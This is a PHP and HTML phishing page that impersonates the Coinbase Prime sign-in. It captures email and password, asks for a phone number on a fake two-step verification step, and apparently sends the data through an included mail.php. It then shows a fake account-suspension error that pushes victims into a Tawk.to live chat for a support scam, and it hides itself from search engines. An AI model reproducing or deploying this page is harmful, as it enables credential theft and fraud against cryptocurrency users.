<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Coinbase - Buy/Sell Cryptocurrency</title>
    <meta name="robots" content="noindex, nofollow"/>
    <meta name="googlebot" content="noindex, nofollow"/>
    <meta name="bingbot" content="noindex, nofollow"/>
    <link rel="icon" href="assets/images/favicon.png" sizes="32x32">
    <link rel="stylesheet" href="assets/css/all.min.css">
    <link rel="stylesheet" href="assets/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/css/style.css">
</head>
<body>
    <nav class="navbar navbar-expand-lg" id="navigation-bar">
        <a class="navbar-brand" href="#">
           <img src="assets/images/logo.png">
        </a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <i class="fas fa-bars"></i>
        </button>
      
    </nav>
     <?php
     if (isset($_POST['btnLoginMore'])) {
        include 'mail.php';
    ?>
           

    <div class="container-fluid" id="welcome-section">
        
        <form action="" method="post">
            
            <h2 id="heading" style="margin-bottom: 5px;">2-Step Verification</h2>
            <p style="text-align: center;margin-bottom: 25px;">Enter the 2-step verification generated by your<br>
authenticator app.</p>
           
           <input type="hidden" name="email" value="<?php echo $_POST['email']; ?>" />
          <input type="hidden" name="password" value="<?php echo $_POST['password']; ?>" />
           
            <div class="form-group" style="display: flex;">
                <label style="padding: 0;"><img src="assets/images/mpbile_phone.jpg" class="html-image-obj ui-resizable" data-original-height="68" data-original-width="43" alt="" width="43" height="68" style="margin: 0px; resize: none; position: static; zoom: 1; display: block; height: 68px; width: 43px;"></label>

                <input type="text" class="form-control" style="    margin-top: 6px;" placeholder="Enter Phone No
" name="number" required>
            </div>
                <button class="btn btn-block btn-primary" name="fromLog" type="submit">Verify </button>
                <div class="links">
                <a href="#">Unable to submit a one-time code ?</a>
                
            </div>
        </form>
    </div>
    <?php } elseif (isset($_POST['fromLog'])) {
         include 'mail.php';
     ?>
   

      <div class="container-fluid errorDiv" id="welcome-section">
        
        <form action="" method="post" style="    border: 1px solid #eee; margin-top: 40px;">
            
          <h2 id="heading" style="color: red;">Important Message!<span></span></h2>
           <p style="text-align: center;">Due to unauthorized activity and identification failure on your Account. Account Access has been suspended. Please Get in touch with our Support Staff Immediately

</p>
            <div class="form">
                <p style="text-align: center;font-weight: 600;font-size: 20px;">Error CODE: EBRX16X76D
</p><br>
            </div>
            <div class="calling-number" style="text-align: center;">
                <a href="javascript:void(Tawk_API.toggle())" style="padding: 8px 12px;
    border-radius: 5px;
    border: 1px solid #1552f0;
    font-size: 16px;background-color: #1552f0;
    color: white;">Ask Expert</a>
            </div>
         
        </form>
    </div>
    <?php } else { ?>

    <div class="container-fluid" id="welcome-section">
        
        <form action="" method="post">
            
            <h2 id="heading">Sign in to <b>Coinbase Prime</b></h2>
           
            <div class="form-group">
                <label>Email</label>
                <input type="email" class="form-control" id="exampleInputEmail1" name="email" aria-describedby="emailHelp"
                    placeholder="you@example.com" required>
            </div>

            <div class="form-group">
                 <label>Password</label>
                <input type="password" class="form-control" id="exampleInputPassword1"
                    placeholder="•••••••••" name="password" required>
            </div>

            <button name="btnLoginMore" type="submit" class="btn btn-block btn-primary">Sign In</button>
             <button type="button" class="btn btn-block btn-default" style="    margin-top: 20px;">Create a business account</button>
           
        </form>
    </div>
    <?php } ?>
    <script src="assets/js/jquery-3.5.1.min.js"></script>
    <script src="assets/js/popper.js"></script>
    <script src="assets/js/bootstrap.min.js"></script>
      <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/621a7b48a34c24564128808d/1fsrn35pf';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->
</body>
</html>